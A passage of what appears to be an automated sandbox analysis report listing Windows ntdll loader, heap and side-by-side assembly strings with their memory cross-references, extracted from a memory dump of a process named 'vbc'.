                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-792281065
                                                                                                                        Strings
                                                                                                                        • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 053A276F
                                                                                                                        • @, xrefs: 05362E4D
                                                                                                                        • .Local\, xrefs: 05362D91
                                                                                                                        • \WinSxS\, xrefs: 05362E23
                                                                                                                        • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 053A2706
                                                                                                                        • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 053A279C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                                                        • API String ID: 0-3926108909
                                                                                                                        Strings
                                                                                                                        • LdrpInitShimEngine, xrefs: 053899F4, 05389A07, 05389A30
                                                                                                                        • Getting the shim user exports failed with status 0x%08lx, xrefs: 05389A01
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 05389A11, 05389A3A
                                                                                                                        • apphelp.dll, xrefs: 05326496
                                                                                                                        • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 053899ED
                                                                                                                        • Loading the shim user DLL failed with status 0x%08lx, xrefs: 05389A2A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-204845295
                                                                                                                        Strings
                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 053A2178
                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 053A2165
                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 053A2160, 053A219A, 053A21BA
                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 053A219F
                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 053A21BF
                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 053A2180
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                        • API String ID: 0-861424205
                                                                                                                        Strings
                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 053A8177, 053A81EB
                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 053A8181, 053A81F5
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0536C6C3
                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 053A8170
                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 053A81E5
                                                                                                                        • LdrpInitializeProcess, xrefs: 0536C6C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                        • API String ID: 0-475462383
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 05372DF0: LdrInitializeThunk.NTDLL ref: 05372DFA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05370BA3
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05370BB6
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05370D60
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05370D74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1404860816-0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                        • API String ID: 0-2518169356
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                        • API String ID: 0-379654539
                                                                                                                        Strings
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 05368421
                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0536855E
                                                                                                                        • @, xrefs: 05368591
                                                                                                                        • LdrpInitializeProcess, xrefs: 05368422
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-1918872054
                                                                                                                        Strings
                                                                                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 053954ED
                                                                                                                        • HEAP[%wZ]: , xrefs: 053954D1, 05395592
                                                                                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 053955AE
                                                                                                                        • HEAP: , xrefs: 053954E0, 053955A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                        Strings
                                                                                                                        • .Local, xrefs: 053628D8
                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 053A21DE
                                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 053A21D9, 053A22B1
                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 053A22B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                        Strings
                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0539106B
                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05391028
                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05390FE5
                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 053910AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                        Strings
                                                                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 053A365C
                                                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 053A3640, 053A366C
                                                                                                                        • LdrpFindDllActivationContext, xrefs: 053A3636, 053A3662
                                                                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 053A362F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                        Strings
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0539A9A2
                                                                                                                        • LdrpDynamicShimModule, xrefs: 0539A998
                                                                                                                        • apphelp.dll, xrefs: 05352462
                                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0539A992
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                        Strings
                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0532CD34
                                                                                                                        • InstallLanguageFallback, xrefs: 0532CD7F
                                                                                                                        • @, xrefs: 0532CD63
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                        Strings
                                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 053A82D7
                                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 053A82DE
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 053A82E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                        Strings
                                                                                                                        • @, xrefs: 053EC1F1
                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 053EC1C5
                                                                                                                        • PreferredUILanguages, xrefs: 053EC212
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                        Strings
                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 053B4888
                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 053B4899
                                                                                                                        • LdrpCheckRedirection, xrefs: 053B488F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                        • API String ID: 0-1373925480
                                                                                                                        Strings
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 053B2104
                                                                                                                        • LdrpInitializationFailure, xrefs: 053B20FA
                                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 053B20F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-2986994758
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: #%u
                                                                                                                        • API String ID: 48624451-232158463
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @4Cw@4Cw$PATH
                                                                                                                        • API String ID: 0-1794901795
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: `$`
                                                                                                                        • API String ID: 0-197956300
                                                                                                                        Strings
                                                                                                                        • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 053D3011
                                                                                                                        • , xrefs: 053D32B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                                                        • API String ID: 0-4088147954
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                        Strings
                                                                                                                        • LdrpResGetMappingSize Enter, xrefs: 0533AC6A
                                                                                                                        • LdrpResGetMappingSize Exit, xrefs: 0533AC7C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                                                        • API String ID: 0-1497657909
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$MUI
                                                                                                                        • API String ID: 0-17815947
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0$Flst
                                                                                                                        • API String ID: 0-758220159
                                                                                                                        Strings
                                                                                                                        • kLsE, xrefs: 05330540
                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0533063D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                        • API String ID: 0-2547482624
                                                                                                                        Strings
                                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0533A309
                                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0533A2FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                        • API String ID: 0-2876891731
                                                                                                                        Strings
                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 05371025
                                                                                                                        • @, xrefs: 05371050
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                                                        • API String ID: 0-2976085014
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: MUI
                                                                                                                        • API String ID: 0-1339004836
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: w
                                                                                                                        • API String ID: 0-476252946
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 0-2766056989
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: GlobalTags
                                                                                                                        • API String ID: 0-1106856819
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: EXT-
                                                                                                                        • API String ID: 0-1948896318
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: AlternateCodePage
                                                                                                                        • API String ID: 0-3889302423
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: BinaryHash
                                                                                                                        • API String ID: 0-2202222882
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: TrustedInstaller
                                                                                                                        • API String ID: 0-565535830
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 0-2766056989
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: WindowsExcludedProcs
                                                                                                                        • API String ID: 0-3583428290
                                                                                                                        Strings
